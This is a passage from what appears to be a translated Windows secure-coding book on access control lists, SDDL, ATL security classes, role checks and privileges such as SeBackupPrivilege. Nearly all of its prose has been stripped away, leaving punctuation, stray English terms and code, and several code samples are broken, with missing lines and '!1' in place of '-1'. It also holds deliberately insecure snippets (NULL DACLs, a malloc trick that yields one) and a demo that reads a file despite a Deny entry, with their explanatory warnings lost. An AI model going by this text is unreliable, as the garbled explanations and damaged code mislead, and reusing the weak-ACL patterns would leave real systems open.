DWORD cbBuff = 0;
MY_VALUE,
NULL,
NULL,
NULL,
BYTE *pbBuff = new BYTE[cbBuff];
// , cbBuff.
if (pbBuff && RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
pbBuff,
// ! .
// .
}
}
delete [] pbBuff;
150
II
, .
, ,
. ,
ACL 10 ,
10 ?
? ,
10 .
, ,
.
:
BYTE bBuff[MAX_BUFF];
ZeroMemory(bBuff, MAX_BUFF);
HKEY hKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Northwindtraders",
0,
KEY_READ,
&hKey) == ERROR_SUCCESS) {
DWORD cbBuff = sizeof (bBuff);
// , , MAX_BUFF.
MY_VALUE,
NULL,
NULL,
bBuff,
// ! .
}
}
if (hKey)
RegCloseKey(hKey);
,
, , , MAX_BUFF.
, RegQueryValueEx ERROR_MO
RE_DATA, , .
: ,
ACL.
ACL

. ACL.
ACL
ACL, , ,
. , , .. ACL
, ,
151
Windows NT/2000/XP. Windows 95/98/Me Windows CE ACL

.
Windows NT ACL* :
(Discretionary Access Control List, DACL) (System Access
Control List, SACL) .
, .
, DACL,
SACL:
;
( \\BlakesLaptop\BabyPictures);
;
;
;
(mutex);
(named pipes);
;
;
Active Directory.
DACL (Access
Control Entry, ACE), . DACL, NULL, ,
.
DACL , ,
.
DACL .
ACE : ,
(security ID, SID)
. SID ,
.
ACE SID Everyone () Full Control (
). Everyone , World (
), S110. Full Control ,
. , Full Control ,
! , ACE ,
. , Everyone
Full Control ,
! .
ACE,
(DS), .
. (ACL) Windows NT/2000/

XP (DACL) (SACL)
. ,
. . .
152
II
, ACL
szVol,
:
#include <stdio.h>
#include <windows.h>
void main() {
char *szVol = "c:\\";
DWORD dwFlags = 0;
if (GetVolumeInformation(szVol,
NULL,
0,
NULL,
NULL,
&dwFlags,
NULL,
0)) {
printf(" %s %s ACL.",
szVol,
(dwFlags & FS_PERSISTENT_ACLS) ? "" : "");
} else {
printf(" %d",GetLastError());
}
}
: , \\Blakes
Laptop\BabyPictures. GetVolumeInformation
Platform SDK MSDN.
VBScript (Microsoft Visual Basic
Scripting Edition) Microsoft JScript. VBScript
, NTFS,
ACL, FileSystemObject.
, NTFS ,
ACL. , Windows
ACL NTFS.
Dim fso, drv

Dim vol: vol = "c:\"
Set fso = CreateObject("Scripting.FileSystemObject")
Set drv = fso.GetDrive(vol)
Dim fsinfo: fsinfo = drv.FileSystem
Dim acls : acls = False
If StrComp(fsinfo, "NTFS", vbTextCompare) = 0 Then acls = True
WScript.Echo(" " & vol & " " & fsinfo)
Wscript.Echo(" ACL? " & acls)
FileSystemObject,
Windows Script Host.
153

, ACL.
Windows . , ,
.
, ;
Administrators ().
ACL
,
, : ACE ACL,
. , , ACE
ACL, .
.
ACL.
ACL;
.
, ACL , :
1. , ;
2. ,
;
3. ;
4.
.
, , ,
, , Web, . .,
. , ACL
. ,
, , .
.
, Everyone:
Full Control .
:
.
: .
.
.
. ,
(use case) UML
(Unified Modeling Language), , ,
.
, ,
.
154
II
UML
(Martin Fowler) (Kendall Scott) UML Distilled: A
Brief Guide to the Standard Object Modeling Language ( UML:
)
(2nd Edition, AddisonWesley Publishing Co, 1999).
, ACL ACE,
, :

. ACE.
, ,
ACE: Interactive: Read (: ).
. 32
, ,
ACE.
Interactive ,
,
( ,
). ,
SID , LogonUser
dwLogonType, LOGON32_LOGON_INTER
ACTIVE.
,
. ,
FTP HTTP
IIS 5.
(
, ), ACL.
ACL, . 61.
6-1. (ACL),
-
Accounting ()
Deny: Full Control (: )
Interactive
Read ()
Administrators ()
Full Control ( )
SYSTEM
Full Control ( )
! ACL ACE
. ACL,
Windows, ACE
.
ACE ,
, .
155

Everyone: Full Control ACL
.
, , ,
.
, ,
ACL
!
ACL ,
(Terminal Server).

, ,
ACL
.
ACL
2001 . Microsoft
Weak Permissions on Winsock Mutex Can Allow Service
Failure ( Winsock
) (MS01003) (www.microsoft.com/technet/security).
ACE-
,
.
ACE.

.

.
ACL
, ,
ACL , ,
. ACL Windows NT 4 Windows 2000,
Visual Studio .NET
ATL (Active Template Library).
ACL Windows NT 4
, ACL
C++, . ,
ACL ,

. Windows NT 4
156
II
. ( Windows NT
malloc AddAce!) , ACL
(security descriptor), .
: ACL,
. ACL
. , ACL,
, ACL
.
/*
NT4ACL.cpp
*/
#include <stdio.h>
#include <aclapi.h>
PSID pEveryoneSID = NULL, pAdminSID = NULL, pNetworkSID = NULL;
PACL pACL = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
// ACL ACE!:
// Network (Deny Access)
// Everyone (Read)
// Administrator (Full Control)
try {
const int NUM_ACES = 3;
EXPLICIT_ACCESS ea[NUM_ACES];
ZeroMemory(&ea, NUM_ACES * sizeof(EXPLICIT_ACCESS)) ;
// SID Network.
SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
if (!AllocateAndInitializeSid(&SIDAuthNT, 1,
SECURITY_NETWORK_RID,
0, 0, 0, 0, 0, 0, 0,
&pNetworkSID) )
throw GetLastError();
ea[0].grfAccessPermissions = GENERIC_ALL;
ea[0].grfAccessMode = DENY_ACCESS;
ea[0].grfInheritance= NO_INHERITANCE;
ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[0].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
ea[0].Trustee.ptstrName = (LPTSTR) pNetworkSID;
// SID Everyone.
SID_IDENTIFIER_AUTHORITY SIDAuthWorld =
SECURITY_WORLD_SID_AUTHORITY;
if (!AllocateAndInitializeSid(&SIDAuthWorld, 1,
SECURITY_WORLD_RID,
0, 0, 0, 0, 0, 0, 0,
&pEveryoneSID) )
ea[1].grfAccessPermissions = GENERIC_READ;
ea[1].grfAccessMode = SET_ACCESS;
ea[1].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
ea[1].Trustee.ptstrName = (LPTSTR) pEveryoneSID;
// SID
// BUILTIN\Administrators.
if (!AllocateAndInitializeSid(&SIDAuthNT, 2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&pAdminSID) )
ea[2].grfAccessPermissions = GENERIC_ALL;
ea[2].grfAccessMode = SET_ACCESS;
ea[2].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
ea[2].Trustee.ptstrName = (LPTSTR) pAdminSID;
// ACL ACE!.
if (ERROR_SUCCESS != SetEntriesInAcl(NUM_ACES,
ea,
NULL,
&pACL))
// .
pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR,
SECURITY_DESCRIPTOR_MIN_LENGTH);
if (pSD == NULL)
if (!InitializeSecurityDescriptor(pSD,
SECURITY_DESCRIPTOR_REVISION))
// ACL .
if (!SetSecurityDescriptorDacl(pSD,
TRUE, // fDaclPresent flag
pACL,
FALSE)) {
157
158
II
} else {
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = FALSE;
sa.lpSecurityDescriptor = pSD;
if (!CreateDirectory("C:\\Program Files\\MyStuff", &sa))
} // try.
} catch(...) {
// .
}
if (pSD)
LocalFree(pSD);
if (pACL)
LocalFree(pACL);
// FreeSID SID, AllocateAndInitializeSID.
if (pEveryoneSID)
FreeSid(pEveryoneSID);
if (pNetworkSID)
FreeSid(pNetworkSID);
if (pAdminSID)
FreeSid(pAdminSID);
, . ,
ACL
(security descriptor).
SECURITY_ATTRIBUTES, , ,
. :
( SID), SetSecurity
DescriptorOwner;
( SID), SetSecurityDescriptor
Group;
DACL, SetSecurityDescriptorDacl;
SACL, SetSecurityDescriptorSacl.

. , ,
, ,
Administrators (),
. DACL,
EXPLICIT_ACCESS. EXPLICIT_ACCESS
ACE (SID)
, . EXPLICIT_ACCESS
159
, , ACE .
ACL . 61.
API, ACL:
SetFileSecurity SetNamedSecurityInfo. Windows NT,
Windows NT 4 .
Windows 2000 ,

(Security Descriptor Definition Language), .
SECURITY_ATTRIBUTES
SECURITY_DESCRIPTOR
ACL
EXPLICIT_ACCESS
SID
. 61.
EXPLICIT_ACCESS
SID
ACL
ACL Windows 2000

, ,
ACL Windows NT 4, Win
dows 2000 ACL
, Security Descriptor Definition Language (SDDL
). SDDL
(SID) (ACE)
.
SDDL Sddl.h
Microsoft Platform SDK.
C:\MyDir
ACE:
Guests (Deny: Full Control) [ (: )];
SYSTEM (Full Control);
Administrators (Full Control);
Interactive (Read, Write, Execute) [ (, , )].
160
II
/*
SDDLACL.cpp
*/
#define _WIN32_WINNT 0x0500
#include <sddl.h>
void main() {
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = FALSE;
char *szSD = "D:P"
// DACL
"(D;OICI;GA;;;BG)"
// Guests
"(A;OICI;GA;;;SY)"
// SYSTEM
"(A;OICI;GA;;;BA)"
// Admins
"(A;OICI;GRGWGX;;;IU)";// ,
// Interactive
if (ConvertStringSecurityDescriptorToSecurityDescriptor(
szSD,
SDDL_REVISION_1,
&(sa.lpSecurityDescriptor),
NULL)) {
if (!CreateDirectory("C:\\MyDir", &sa )) {
DWORD err = GetLastError();
}
LocalFree(sa.lpSecurityDescriptor);
}
}
( Secureco2\Chapter06.)
, Windows NT 4. SDDL
szSD .
SDDL ACL (. 62).
6-2.
SDDL-
SDDL-
D:P
D , DACL. S:
ACE ( SACL). ACE
. P SE_DACL_PROTECTED,
ACE
.
,
(D;OICI;GA;;;BG)
ACE. ACE
.
D ACE.
161
()
6-2.
SDDL-
OICI . , ACE
(
) ( ),
.
GA Generic All Access, .
BG Guests (Builtin Guests).
ACE
.

ObjectTypeGuid InheritedObjectTypeGuid.
, ACE (
). ACE

A ACE.
(A;OICI;GA;;;SY)
SY SYSTEM ( )
(A;OICI;GA;;;BA)
BA Administrators (Builtin Administrators)
(A;OICI;GRGWGX;;;IU)
GR , GW , GX .
IU Interactive (,
)
. 62 SDDL.
DACL
D:(D;OICI;GA;;;BG)(A;OICI;GA;;;SY) (A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)
ACE
. 62.
ACE
SDDL
,
. 63 SID Windows 2000
.
6-3. SID SDDL

SDDL-
AO
Account Operators ( )
AU
Authenticated Users ( )
BA
Builtin Administrators Administrators (

)
BG
Builtin Guests Guests ()
BO
Backup Operators ( )
BU
Builtin Users Users ()
CA
Certificate Server Administrators Administrators
CO
Creator Owner ()
DA
Domain Administrators ( )
. . .
162
II
6-3.
()
SDDL-
DG
Domain Guests ( )
DU
Domain Users ( )
IU
Interactive ()
LA
Local Administrator ( )
LG
Local Guest ( )
NU
Network ()
PO
Print Operators ( )
PU
Power Users ( )
RC
Restricted Code ,
CreateRestrictedToken Windows 2000
SO
Server Operators ( )
SU
Service Logon User ,

SY
Local System ( )
WD
World ( , Everyone)
NS
Network Service ( Windows XP )
LS
Local Service ( Windows XP )
AN
Anonymous Logon ( ) ( Windows XP

)
RD
Remote Desktop Users ( )

Terminal Server Users ( )
(Windows XP )
NO
Network Configuration Operators ( )

( Windows XP )
LU
Logging Users ( Windows .NET Server )
MU
Monitoring Users ( Windows .NET Server )
SDDL , SDDL
XML. , SDDL INF
(Security Configuration Editor)
ACL NTFS.
Windows (Windows Security
Push)
, Windows XP Logging Users Monitoring Users.
ACL Active Template Library

ATL (Active Template Library) C++,
Visual Studio 6 Visual Studio .NET.
ATL,
Windows, ACL
. ( Visual Studio
.NET) ACL :
163
Blake (Read);
Guests (Deny: Access).
/*
ATLACL.cpp
*/
#include <atlsecurity.h>
#include <iostream>
void main(){
try {
// .
CSid sidBlake("Northwindtraders\\blake");
CSid sidAdmin = Sids::Admins();
CSid sidGuests = Sids::Guests();
// ACL ACE!.
// : ACE .
CDacl dacl;
dacl.AddDeniedAce(sidGuests, GENERIC_ALL);
dacl.AddAllowedAce(sidBlake, GENERIC_READ);
dacl.AddAllowedAce(sidAdmin, GENERIC_ALL);
// .
CSecurityDesc sd;
sd.SetDacl(dacl);
CSecurityAttributes sa(sd);
// .
if (CreateDirectory("c:\\MyTestDir", &sa))
cout << " !" << endl;
} catch(CAtlException e) {
cerr << ", ".
<< hex << (HRESULT)e << endl;
}
}
Sids::Admins() Sids::Guests().
SID ,
Administrators Guests, ,
Windows (, , )
. SID
C++, atlsecurity.h.
164
II
, ,
Windows NT 4 Windows 2000. , Windows NT 4,
, , Windows 2000, SDDL
. Secureco2\Chapter06.
, ACL ,
ACL.
ACE-
ACE ACL.
Windows ACE.
,
. ,
ACL , , ACE,
. ACE
ACL:
, (Explicit Deny);
, (Explicit Allow);
, ;
, ;
, ;
, ;
, ;
, . .
ACL ACE,
.
1. GetSecurityInfo GetNamedSecurityInfo,
ACL .
2. ACE EXPLICIT_ACCESS.
3. SetEntriesInAcl, ACL EXPLI
CIT_ACCESS, ACE.
4. SetSecurityInfo SetNamedSecurityInfo,
ACL .
C++, .
, , CreateWellKnownSid (
Windows 2000 SP3, Windows XP Windows .NET Server),
, ATL CSid.
/*
SetUpdatedACL.cpp
*/
#define _WIN32_WINNT 0x0501
#include "windows.h"
#include "aclapi.h"
#include <sddl.h>
int main(int argc, char* argv[]) {

char *szName = "c:\\junk\\data.txt";
PACL pDacl = NULL;
PACL pNewDacl = NULL;
PSECURITY_DESCRIPTOR sd = NULL;
PSID sidAuthUsers = NULL;
DWORD dwErr = 0;
try {
dwErr =
GetNamedSecurityInfo(szName,
SE_FILE_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
&pDacl,
NULL,
&sd);
if (dwErr != ERROR_SUCCESS)
throw dwErr;
EXPLICIT_ACCESS ea;
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
DWORD cbSid = SECURITY_MAX_SID_SIZE;
sidAuthUsers = LocalAlloc(LMEM_FIXED,cbSid);
if (sidAuthUsers == NULL)
throw ERROR_NOT_ENOUGH_MEMORY;
if (!CreateWellKnownSid(WinAuthenticatedUserSid,
NULL,
sidAuthUsers,
&cbSid))
BuildTrusteeWithSid(&ea.Trustee, sidAuthUsers);
ea.grfAccessPermissions = GENERIC_READ;
ea.grfAccessMode
= SET_ACCESS;
ea.grfInheritance
= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea.Trustee.TrusteeType = TRUSTEE_IS_GROUP;
dwErr = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
if (dwErr != ERROR_SUCCESS)
throw dwErr;
dwErr =
SetNamedSecurityInfo(szName,
SE_FILE_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
165
166
II
NULL,
pNewDacl,
NULL);
} catch(DWORD e) {
//
}
if (sidAuthUsers)
LocalFree(sidAuthUsers);
if (sd)
LocalFree(sd);
if (pNewDacl)
LocalFree(pNewDacl);
return dwErr;
}
AddAccessAllowedAceEx AddAccessAllowedObjectAce ACE
ACL. ACL
.
, AddAccessAllowedACE,
ACL.
AddAccessAllowedACEEx.
SID

Windows SID (Terminal
Server) (Remote Desktop),
, (Win
dows 2000 Server) (Windows XP
). SID ,
, ACL, :
Remote Desktop Users (Read) [ (
)];
Interactive Users (Read, Write).
: SID Remote Desktop Users,
.
:
, Madison
. Madison SID
Interactive, ;
Madison ;
167

Windows XP VPN;
Madison
SID Remote Desktop Users.
, ,
, ,

.
, , Madison ,
, .
:
. , Madison
.
, , Madison
, SID
!
, ?
, ACL.
DACL ACE
DACL (NULL DACL)
, .
, NULL DACL = . .
,
, , , ,
, DACL, .
,
, , DACL !
, ,
. .
if (SetSecurityDescriptorDacl(&sd,
TRUE, // DACL...
NULL, // ... !
FALSE)) {
// DACL.
}

SECURITY_DESCRIPTOR. DACL:
SECURITY_DESCRIPTOR sd = {
SECURITY_DESCRIPTOR_REVISION,
0x0,
SE_DACL_PRESENT,
0x0,
0x0,
0x0,
0x0};
// DACL , .. .
168
II

DACL, ATL
Visual Studio .NET.
Windows XP, Secure Windows Initiative Team
Windows Security Penetration Team
DACL, .
,
DACL, :
,
ACL. ,
ACL;
DACL ,
DACL .
,
, ,
!
,
. , ACL ,
.
ACL, .
.
DACL
.
NULL, DACL
, DACL, .
Perl DACL
C++ C ,
Microsoft. DACL,
,
DACL . ,
,
, DACL. :
SetSecurityDescriptorDacl(&sd,
TRUE,
NULL, // DACL
FALSE);
( ) :
SetSecurityDescriptorDacl(&sd,
TRUE,
::malloc(0xFFFFFFFF), // DACL
FALSE);
169
, . malloc
, NULL.
0xFFFFFFFF, 4 294 967 295 , ,
, DACL NULL!
, , , ,
. ,
.
DACL
DACL : (
) Everyone (Deny: Access),
, Windows
. ,
DACL SACL !
! DACL . ,
, .
ACE
ACE : Everyone (WRITE_DAC), Everyone (WRI
TE_OWNER) ACL, .
Everyone (WRITE_DAC)
WRITE_DAC DACL .
ACL,
.
Everyone (WRITE_OWNER)
WRITE_OWNER
. , , .
, ,
.
Everyone (FILE_ADD_FILE)
ACE Everyone (FILE_ADD_FILE) ,

. ,
, .
, ,
, .
Everyone (DELETE)
ACE ,
, ,
.
170
II
Everyone (FILE_DELETE_CHILD)
Windows Delete
subfolders and files ( )
, , .
FILE_DELETE_CHILD ,
.
Everyone (GENERIC_ALL)
GENERIC_ALL, Full Control ( ), ,
NULL DACL. .
, DACL
,
DACL, , , .
:
.
DACL,
.
ACE,
, !
ACL,
:
DACL [Everyone (WRITE_DAC)];
[Everyone (WRITE_OWNER)];
[Everyone (DELETE)].
, ,
:
DWORD dwFlags = KEY_ALL_ACCESS

& ~WRITE_DAC
& ~WRITE_OWNER
& ~DELETE;
:
DWORD dwFlags = FILE_ALL_ACCESS

& ~WRITE_DAC
& ~WRITE_OWNER
& ~DELETE
& ~FILE_DELETE_CHILD

ACL , .
.NET Framework COM+, IP,
SQL Server. ,
, ACL .
171

,
, .
,
, ( ) .
, ,
.
:
,
, .
, , ,
.
Windows : .NET
Framework COM+. .
.NET Framework
.NET Framework
,
(principal). (
) Windows .
.NET Framework
/ .
,
(
).
. ,
.
.NET Framework
.
(. ): Lippert LaMac
chia, Lange .

.NET Framework Prin
cipalPermission, CLR (Common Language Runtime)
, .
PrincipalPermission ,
,
.
, , .
, .NET Framework
Web Web:
WindowsPrincipal wp = (HttpContext.Current.User as WindowsPrincipal);

if ( wp.IsInRole("Managers")) {
172
II
// .
}
:
WindowsPrincipal principal =
(Thread.CurrentPrincipal as WindowsPrincipal);
if (principal.IsInRole("Administrator")) {
// .
}
: WindowsPrincipal. IsInRole ,
Windows, GenericPrincipal. IsInRole ,
,
.
GenericPrincipal ,
. C#, :
GenericIdentity id = new GenericIdentity("Blake");

// XML!
String[] roles = {"Manager", "Teller"};
GenericPrincipal principal = new GenericPrincipal(id, roles);
COM+
COM+ Windows,
.
,
. , ,
, , ,
, .
COM+ Component
Services ( ) IsCallerInRole.
, Visual Basic:
.
Dim fAllowed As Boolean
Dim objCallCtx As SecurityCallContext
Set objCallCtx = GetSecurityCallContext()
' .
fAllowed = objCallCtx.IsCallerInRole("Doctor")
If (fAllowed) Then
.
End If
ACL, , ,
,
. ,
.
173
fIsDoctor = objCallCtx.IsCallerInRole("Doctor")
fIsOnDuty = IsCurrentlyOnDuty(szPersonID)
If (fIsDoctor And fIsOnDuty) Then
, ,
.
End If

.
IP-
Web, IIS.

Web, IP (, 192.168.19.23),
(192.168.19.0/24), DNS (www.microsoft.com) (.micro
soft.com). Web
IP,
IP ,
.

accounting.northwindtraders.com,
: IP.
IP ,

. : IP
,
(127.0.0.1).
! Web,
IP, IP
127.0.0.1.
VBScript , IP
Samples Web ,
localhost ( 127.0.0.1).
IP.
Dim oVDir
Dim oIP
Set oVDir = GetObject("IIS://localhost/W3SVC/1/Samples")
Set oIP = oVDir.IPSecurity
' IP! ! 127.0.0.1.
Dim IPList(1)
IPList(1) = "127.0.0.1"
oIP.IPGrant = IPList
' .
oIP.GrantByDefault = False
174
II
' IIS
' .
oVDir.IPSecurity = oIP
oVDir.SetInfo
Set oIP = Nothing
Set oVDir = Nothing
SQL Server
SQL Server
.
, .
: . ,

, . ,
.
SQL Server ACL Windows,
: (
) . :
Blake Accounts (),
, AuditLog (
). SQL Server .

, ACL
. .
,
.

, ,
;
. ,

,
.
.
,
,
.
, .
,
:
: .

:
175
: ;
: ;
: .
:
: ;
: ;
: .
,
Windows SQL Server,
COM+. (:
.) :
ACL. , SQL Server;
, .

. ,
SQL Server.
,
. ,
.
create trigger checkaudit on tblAuditLog

for update, delete
as
begin
if not is_member(Northwindtraders\Auditors')
rollback tran
end
,
, .
:
, .
, : (public)
. ,
Everyone Windows. ,
. : !
,
(
) .

, .
. . 63 IP
Web.
176
II
IP-
Web-
. 63.
IP
, .
, IP,
.
! , ,
, .
. IIS,
( !) Web (
) : I .

! , Web, ,
Web
. , Web
SMB.
, ACL Web
?
!
! :
ACL, SQL Server, IP .
,
, ,
ACL IP,
.

ACL ,
. ACL
.
, 3, ACL
.
:
.
,
. ,
, .

, .

,
. Windows
,
.
. ,
!
(
), ,
, .
,
(
, , ),
. ,
, , ,
. ,
Administrators (),
178
II
.
.
, ,
, ,
. ,
.
, ,
, ,
.
!
,
.
,
, ,
, .
,
.
( , ),
.
(malware).

, , ,
, ,
.

, ,
, ,
. ,
.

(defacement) Web.
,
, .

, ,
.
, , ,
.
179
Back Orifice
,
: , ,
.
Back Orifice Windows
, HKEY_LOCAL_MACHINE\SOFTWARE\Mic
rosoft\Windows\CurrentVersion\Run.
. ,
Back Orifice .
SubSeven
Back Orifice, SubSeven
. SubSeven
Windows, Win.ini System.ini,
HKEY_LOCAL_MACHINE HKEY_CLASSES_ROOT.
. ,
, SubSeven .
FunLove
FunLove, Symantec W32.Funlove.4099,
, W32.Bolzano.
, , ,
. FunLove
Windows NT Ntoskrnl.exe.
FunLove ,
.
ILoveYou
, , , VBS.Lo
veletter The Love Bug. ILoveYou Microsoft
Outlook. : ,
HKEY_LOCAL_MACHINE .
, .
Web-
Web, ,
(script kiddies). Web Internet
Information Services (IIS),
(Internet Printing Protocol, IPP) Microsoft Windows 2000.
, IPP ISAPI
(Internet Server Application Programming Interface),
(SYSTEM).
Microsoft (http://www.micro
soft.com/technet/security/bulletin/MS01023.asp):
180
II
, ISAPI

. ,
,
,
. ,
.
IPP Windows 2000 SYSTEM,
Web .
,
Web.
! ,
,
,
.
, .
! ,
, ,
Windows.

Microsoft Windows NT/2000/
XP Windows .NET Server 2003 :
(Discre
tionary Access Control List, DACL). DACL (
ACL* ) (Access Control Entry, ACE).
ACE (Security ID, SID)
(principal), , ,
, .
, ,
, ACL.
ACL 6.

Windows ,
, (
) , ,
, ,
. (ACL) Windows NT/2000/

XP (DACL) (SACL)
. ,
. . .
181
. . ,
(, )
. 71.
7-1.
Windows

( )

#define (Winnt.h)
Backup Files And Directories

(
)
SeBackupPrivilege (16)
SE_BACKUP_NAME
Restore Files And Directories

(
)
SeRestorePrivilege (17)
SE_RESTORE_NAME
Act As Part Of The Operating SeTcbPrivilege (6)

System (
)
SE_TCB_NAME
Debug Programs
( )
SeDebugPrivilege (19)
SE_DEBUG_NAME
Replace A Process Level

Token (
)
SeAssignPrimaryToken
Privilege (2)
SE_ASSIGNPRIMARYTOKEN_
NAME
Load And Unload Device

SeLoadDriverPrivilege (9)
Drivers (
)
SE_LOAD_DRIVER_NAME
Take Ownership Of Files Or

Other Objects (

)
SE_TAKE_OWNERSHIP_NAME
SeTakeOwnershipPrivilege (8)
,
, ,
.
.
,
.
.
SeBackupPrivilege
Backup files and directories
, . , Blake
, , , ACL
.
, CreateFile FILE_FLAG_
BACKUP_SEMANTICS. , .
1. ,
,
.
2. Test.txt .
182
II
3. ACL ACE,
. , Blake, ACE:
Blake (Deny All).
4. .
, , MSDN (http://
msdn.microsoft.com) Platform SDK
/*
WOWAccess.cpp
*/
#include <stdio.h>
int EnablePriv (char *szPriv) {
HANDLE hToken = 0;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES,
&hToken)) {
printf("OpenProcessToken() !> %d", GetLastError());
return !1;
}
TOKEN_PRIVILEGES newPrivs;
if (!LookupPrivilegeValue (NULL, szPriv,
&newPrivs.Privileges[0].Luid)) {
printf("LookupPrivilegeValue() !>%d",
GetLastError());
CloseHandle (hToken);
return !1;
}
newPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
newPrivs.PrivilegeCount = 1;
if (!AdjustTokenPrivileges(hToken, FALSE, &newPrivs , 0,
NULL, NULL)) {
printf("AdjustTokenPrivileges() !>%d",
GetLastError());
return !1;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
printf("AdjustTokenPrivileges() ,
\n");
return 0;
}
183
void DoIt(char *szFileName, DWORD dwFlags) {

printf("\n\n %s 0x%x \ n",
szFileName, dwFlags);
HANDLE hFile = CreateFile(szFileName,
GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING,
dwFlags,
NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf(" CreateFile() !> %d",
GetLastError());
return;
}
char buff[128];
DWORD cbRead=0, cbBuff = sizeof buff;
ZeroMemory(buff, sizeof buff);
if (ReadFile(hFile, buff, cbBuff, &cbRead, NULL)) {
printf(", %d \n\n: %s",
cbRead, buff);
} else {
printf("ReadFile() ! > %d", GetLastError());
}
CloseHandle(hFile);
}
void main(int argc, char* argv[]) {
if (argc < 2) {
printf(": %s <filename>", argv[0]);
return;
}
// .
If (EnablePriv(SE_BACKUP_NAME) == !1)
return;
// .
DoIt(argv[1], FILE_ATTRIBUTE_NORMAL);
// !
DoIt(argv[1], FILE_ATTRIBUTE_NORMAL |
FILE_FLAG_BACKUP_SEMANTICS);
}
Secureco2\Chap
ter07. :
184
II
Test.txt 0x80.
CreateFile() !> 5
Test.txt 0x2000080 flags
, 15 .
: Hello, Blake!
, CreateFile
( 5), , ,
, FILE_FLAG_BACKUP_SEMANTICS.
SeBackupPrivilege . ,
SeBackupPrivilege SeRestorePrivilege,
. NTBackup.exe,
, ACL,
, .
SeBackupPrivilege .
, :
;
, .
SeRestorePrivilege
,
. , DLL EXE
, ! ,
,
.
SeDebugPrivilege
Debug Programs
,
. ,

. 9.
,
SSL/TLS,
, nCipher (http://www.ncipher.com).
, TerminateProcess
Debug Programs . , ,
, ,
, Lsass.exe,
(Local Security Authority, LSA).
!
, CreateRemote
Thread
.
LSADUMP2 (http://razor.bindview.com/tools):
LSA.
185
Lsass.exe ,
, .
LSA 9.

(Jeffrey Richter) Programming Applications for Microsoft Windows
(Microsoft Press) ( . Windows :
Win32 64 Windows. .:
; .: , 2001).
,
Debug Programs ,
.
. , Blake
, ,
Cheryl.
SeTcbPrivilege
Act as part of the operating system [
Trusted Computing Base (TCB)]
.
Windows.
SYSTEM.
! TCB,
. , , ,
.
TCB
LogonUser,
. , Windows XP, LogonUser
Windows
.
Passport GroupSid NULL.
SeAssignPrimaryTokenPrivilege
SeIncreaseQuotaPrivilege
Replace A Process Level Token Increase Quotas

(spoofing)
.
SeLoadDriverPrivilege

, .
186
II
SeLoadDriverPrivilege,
.
,
.
, (Plug and Play)
Plug and Play.
SeRemoteShutdownPrivilege
.
: ,
. ,
, Everyone ()
! DS (Denial of Service)
!
SeTakeOwnershipPrivilege
Windows NT/2000/XP (owner).
( ),
, .
,
.
, Windows XP ,
,
. Windows XP , Windows
.NET Server 2003,
Administrators (),
.
Bypass Traverse Checking ( ),

SeChangeNotifyPrivilege ,
.
. ,
,

Windows .
NTFS.

Windows NT/2000/XP
(token),

. SID , SID
, , .
187
,
. ,
.
(,
) .
Windows 2000,
SID .
(restricted token). ,
.
, ,
SID, ACL
Microsoft Windows NT/2000/XP
, , .
.

, CreateProcessAsUser. , ,
CreateProcessAsUser, SeAssignPri
maryTokenPrivilege SeIncreasQuotaPrivilege. , ,
,
, SeAssignPrimaryTokenPrivilege .
,
(Service Control Manager, SCM).
Local System,
,
SCM (. 71).
. 71.
SCM
LSA.
LSA 9.
188
II
,
,
,
, .
,
, .
SID ,

SID .
ACL, .
, ,
,
. ,
, .
? :
.
, SID .
, .
, ,
SID .

, ,
, ,
. , , ,
, :
, ACL;
, ;
LSA.
,
.
ACL
NTFS ACL:
SYSTEM Full Control ( );
Administrators () Full Control ( );
Everyone () Read ().
,
, (
/
). : 5!
189
: ,
, ,
.
C:\Program Files? : .
,
. ,
.
!
,
. ! Game Over!
GENERIC_ALL
, ACL,
, , . ACL
GENERIC_ALL.
?
SYSTEM. GENERIC_ALL Full Control
( ). ,
. ,
. GENERIC_ALL? , .
GENERIC_READ,
, ACL Read
() Everyone ().
: ,
, ,
( ACE)
.
: Windows NT/2000/XP
, .
, ACL ,

.
,
dwDesiredAccess MAXIMUM_ALLOWED,
, .

,
. :

,
. .
LSA
LSA .
LSA API LsaStorePrivateData LsaRetrievePrivateData.
190
II
, LSA
. Platform SDK LsaStore
PrivateData: , DACL
. , LSA
, ,

.
,
-
( ),

.
ACL
ACL:
;
,
;
ACL .
, ,
. ,
. ,
.
:
, HKEY_LOCAL_MACHINE,
C:\Program Files ( ,
%PROGRAMFILES%) C:\Winnt (%SYSTEMROOT%).
HKEY_CURRENT_USER,
.
:
#include "shlobj.h"
...
TCHAR szPath[MAX_PATH];
...
if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_PERSONAL NULL, 0, szPath)) {
HANDLE hFile = CreateFile(szPath, ...);
M
}

, ,
,
, .
:
.
191
,
(ACL) ,
. , ,
ACL .
.

,
, , .
, ,
! ,
, .
LSA
Windows 2000/XP API (Data Protection API, DPAPI).
,
,
,
.
DPAPI 9.

6, ACL
ACE. SID .
, SID
.
.
( ),
SID , .
1. , .
2. API, .
3. , .
4. , SID .
5. , SID .
6. .
